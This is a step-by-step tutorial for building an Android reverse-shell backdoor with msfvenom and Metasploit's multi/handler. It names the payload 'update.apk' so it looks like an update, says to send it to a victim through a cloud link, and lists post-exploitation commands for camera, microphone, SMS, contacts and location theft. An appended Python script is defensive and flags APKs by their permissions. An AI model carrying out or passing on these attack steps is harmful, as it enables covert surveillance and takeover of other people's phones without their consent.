Creating a basic backdoor on an android mobile
In this article you'll learn the most basic way to hack an android mobile phone using the Metasploit framework.
Note: you can do this in both LAN and WAN
#1. Create a reverse TCP shell for android
This is the malware file that you create to backdoor the android.
Replace the ‘LHOST’ with your host machine IP address.
View your IP by executing ‘ip a’ command on terminal.
You can even use your public IP here.
Using your public IP allows you to hack any mobile outside your network.
This means you can backdoor any 'android mobile' in the world.
Note: To use a public IP, port forwarding to your host machine must be enabled on the router.
In the command below, -p = payload.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 R > /root/update.apk
#2. Start Metasploit framework
Start the Metasploit framework in a new terminal
msfconsole
#3. Start the multi handler
You need to start the multi handler exploit to create the listener.
Why do we use the multi handler?
The backdoor is executed on the victim's mobile (which is outside the framework), and it needs a listener to connect back to so that you can take control.
The multi handler exploit:
- can be used to attack multiple hosts
- is compatible with many payloads
- also works as a listener
msf6 > use exploit/multi/handler
#4. Set the payload for the multi handler
Set the payload that the multi handler will receive the shell from.
Here we set the same payload that we created in step #1.
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
#5. Set the host address
You need to set the IP of your attacker machine so that the shell connects back to your machine.
msf6 exploit(multi/handler) > set LHOST 192.168.1.7
#6. Set the port
Set the listening port of your host machine. In this case I'll use port 4444.
msf6 exploit(multi/handler) > set LPORT 4444
#7. Start exploit
You can now start the listener by executing the 'exploit' command.
msf6 exploit(multi/handler) > exploit
#8. Install the backdoor
Install the malware backdoor you created in step #1 on the victim's mobile.
You can upload the malware file to a cloud service like dropbox or zippyshare and send the link to the victim.
As soon as the victim installs the 'update.apk',
WOOPIES!!
Simple as that!!
You will get the meterpreter prompt, as in Figure 8!!
#9. Post exploitation
Below are some post exploitation commands for you to try after you get the meterpreter prompt.
- sysinfo
- webcam_list
- webcam_snap
- record_mic
- activity_start
- check_root
- dump_calllog
- dump_contacts
- geolocate
- wlan_geolocate
- send_sms
- sms_dump
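Seen from the defender's side, most of the commands listed above only work if the installed app was granted the matching Android permission, so the permission set of an unknown APK is a quick triage signal. The script below is an added example, not part of the original article: it parses the text printed by `aapt dump permissions <file.apk>` and reports which of the step 9 commands the APK's permissions would enable. The command-to-permission mapping, the `threshold` parameter and both sample outputs are assumptions constructed for illustration.

```python
import re

# Assumed mapping (not from the article): the Android permission each
# Meterpreter command listed in step 9 depends on.
COMMAND_PERMISSIONS = {
    "webcam_snap": "android.permission.CAMERA",
    "record_mic": "android.permission.RECORD_AUDIO",
    "dump_calllog": "android.permission.READ_CALL_LOG",
    "dump_contacts": "android.permission.READ_CONTACTS",
    "geolocate": "android.permission.ACCESS_FINE_LOCATION",
    "send_sms": "android.permission.SEND_SMS",
    "sms_dump": "android.permission.READ_SMS",
}

# Accepts both aapt styles: "uses-permission: name='X'" and "uses-permission: X".
PERMISSION_RE = re.compile(r"uses-permission(?:-sdk-\d+)?:\s*(?:name=)?'?([\w.]+)'?")

def requested_permissions(aapt_output):
    """Return the set of permission names found in aapt's text output."""
    return set(PERMISSION_RE.findall(aapt_output))

def triage(aapt_output, threshold=4):
    """Flag an APK that has network access plus many surveillance permissions.

    threshold is a hypothetical tuning knob: how many of the mapped
    commands must be enabled before the APK is marked suspicious.
    """
    perms = requested_permissions(aapt_output)
    enabled = sorted(c for c, p in COMMAND_PERMISSIONS.items() if p in perms)
    has_network = "android.permission.INTERNET" in perms
    return {"enabled_commands": enabled,
            "suspicious": has_network and len(enabled) >= threshold}

# Constructed sample outputs (not captured from real APKs).
SUSPECT = "package: com.example.update\n" + "".join(
    f"uses-permission: name='android.permission.{p}'\n"
    for p in ("INTERNET", "CAMERA", "RECORD_AUDIO", "READ_CALL_LOG",
              "READ_CONTACTS", "ACCESS_FINE_LOCATION", "SEND_SMS", "READ_SMS"))
BENIGN = ("package: com.example.camera\n"
          "uses-permission: android.permission.INTERNET\n"
          "uses-permission: android.permission.CAMERA\n")

if __name__ == "__main__":
    for label, sample in (("update.apk", SUSPECT), ("camera.apk", BENIGN)):
        print(label, triage(sample))
```

A broad permission set is not proof of a backdoor on its own, so treat a hit as a reason to inspect the APK further rather than as a verdict.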